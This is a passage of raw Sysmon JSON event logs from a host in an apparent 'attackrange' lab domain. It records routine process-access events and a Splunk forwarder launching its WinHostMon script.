05:48:44.857","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.857\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-001016550500}\r\nTargetProcessId: 3368\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.857","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-001016550500}","TargetProcessId":"3368","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.969\r\nProcessGuid: {A837DB8D-023C-5F25-0000-0010A85A0500}\r\nProcessId: 2952\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.969","ProcessGuid":"{A837DB8D-023C-5F25-0000-0010A85A0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinHostMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A85A0500}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A85A0500}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023C-5F25-0000-0010A85A0500}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023C-5F25-0000-0010A85A0500}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:44.967","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:44.967\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 